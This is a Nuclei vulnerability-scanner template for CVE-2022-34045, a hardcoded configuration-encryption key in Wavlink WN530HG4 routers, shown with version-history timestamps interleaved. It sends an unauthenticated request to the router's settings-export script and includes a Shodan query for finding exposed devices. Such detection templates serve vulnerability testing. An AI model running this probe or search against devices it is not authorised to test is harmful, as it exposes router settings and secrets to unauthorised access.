nuclei-templates/cves/2022/CVE-2022-34045.yaml

40 lines
999 B
YAML
Raw Normal View History

2022-08-14 11:40:20 +00:00
id: CVE-2022-34045
info:
name: Wavlink WN530HG4 - Access Control
author: arafatansari
2022-08-14 12:36:14 +00:00
severity: critical
2022-08-14 11:40:20 +00:00
description: |
Wavlink WN530HG4 M30HG4.V5030.191116 was discovered to contain a hardcoded encryption/decryption key for its configuration files at /etc_ro/lighttpd/www/cgi-bin/ExportAllSettings.sh.
reference:
2022-08-14 12:36:14 +00:00
- https://drive.google.com/file/d/1s5uZGC_iSzfCJt9BJ8h-P24vmsrmttrf/view?usp=sharing
- https://nvd.nist.gov/vuln/detail/CVE-2022-34045
classification:
cve-id: CVE-2022-34045
2022-08-14 11:40:20 +00:00
metadata:
2022-08-14 12:36:14 +00:00
verified: true
2022-08-14 11:40:20 +00:00
shodan-query: http.html:"WN530HG4"
2022-08-14 12:36:14 +00:00
tags: cve,cve2022,wavlink,exposure
2022-08-14 11:40:20 +00:00
requests:
- raw:
- |
GET /cgi-bin/ExportAllSettings.sh HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
2022-08-14 12:36:14 +00:00
part: body
2022-08-14 11:40:20 +00:00
words:
- 'url=/backupsettings.dat'
2022-08-14 12:36:14 +00:00
- type: word
part: header
words:
- 'lighttpd'
- type: status
status:
- 200